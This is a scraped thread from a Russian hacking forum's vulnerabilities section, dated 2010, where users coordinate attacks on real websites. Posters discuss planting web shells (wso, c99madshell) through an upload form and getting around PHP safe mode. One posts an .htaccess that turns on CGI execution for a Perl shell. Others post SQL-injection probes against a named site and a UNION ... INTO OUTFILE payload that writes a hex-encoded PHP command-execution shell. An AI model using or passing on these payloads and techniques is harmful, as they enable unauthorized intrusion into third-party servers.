ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13251  
Старый 17.05.2010, 20:03
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от DrakonHaSh  
Konqi
каким образом на одном и том же сайте php-скрипты обладают разными правами ?
когда создают разные пользователи

+ sefa mode=On

Последний раз редактировалось Konqi; 17.05.2010 в 20:07..
 
Ответить с цитированием

  #13252  
Старый 17.05.2010, 20:08
Аватар для DrakonHaSh
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

Цитата:
Сообщение от Konqi  
когда создают разные пользователи
извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на создание файлов в photo/

Последний раз редактировалось DrakonHaSh; 17.05.2010 в 20:12..
 
Ответить с цитированием

  #13253  
Старый 17.05.2010, 20:13
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от DrakonHaSh  
извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на запись в photo/

если можно загрузи wso, посмотрим что тут творится,а то твой шелл просто ужас,глаза уже заболели =\

у меня тоже такое было,даже не мог посмотреть файлы на текущей директории
 
Ответить с цитированием

  #13254  
Старый 17.05.2010, 20:23
Аватар для DrakonHaSh
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

158.php.jpg это wso
 
Ответить с цитированием

  #13255  
Старый 17.05.2010, 20:24
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

DrakonHaSh, грузи другой шел который обходит Safe-mode
 
Ответить с цитированием

  #13256  
Старый 17.05.2010, 20:31
Аватар для DrakonHaSh
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

warlok посоветуй плиз какой конкретно, я пробовал c99madshell и wso2.4, другими не пользовался

[добавлено]
попробовал PPS 1.0 - Perl-cgi web shell by Pashkela, но отображается текстом.
залил такой .htaccess
Код:
Options +ExecCGI
AddHandler cgi-script cgi pl
проблема решена

но если кто ответит на мои вопросы то тоже будет очень клева

Последний раз редактировалось DrakonHaSh; 17.05.2010 в 21:00..
 
Ответить с цитированием

  #13257  
Старый 17.05.2010, 23:30
Аватар для B0o0M
B0o0M
Участник форума
Регистрация: 03.08.2009
Сообщений: 103
Провел на форуме:
413428

Репутация: 13
По умолчанию

Не могу составить правильный запрос, наверно дико туплю
http://www.macemates.net/news.asp?P=7+AND+1=2--
http://www.macemates.net/news.asp?P=7%27+AND+1=2--
http://www.macemates.net/news.asp?P=7%29+AND+1=2--
не прокатывают, как вы составляете правильное выражение ???
пожалуста пример если можно
 
Ответить с цитированием

  #13258  
Старый 17.05.2010, 23:40
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

не прокатит
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'Cint'

/news.asp, line 110
 
Ответить с цитированием

  #13259  
Старый 17.05.2010, 23:50
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Microsoft JET Database Engine error '80040e14'

значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
 
Ответить с цитированием

  #13260  
Старый 18.05.2010, 02:38
Аватар для Saiga
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

здрасте

Не Могу понять в чем проблема..
делаю такой запрос :

6+union+select+1+into+outfile+'1.php'+--+

на что получил ответ :

display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists

ТОЕСТЬ я могу создавать файлы ?

потом делаю что то такое:

6+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+

на что получил ответ :
display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B2763 6D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists


и как мне теперь проверить что у меня получилось ?
где мне найти этот '1.php'

если кому не лень можна и попадробней в PM

спс за время.

Последний раз редактировалось Saiga; 18.05.2010 в 02:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ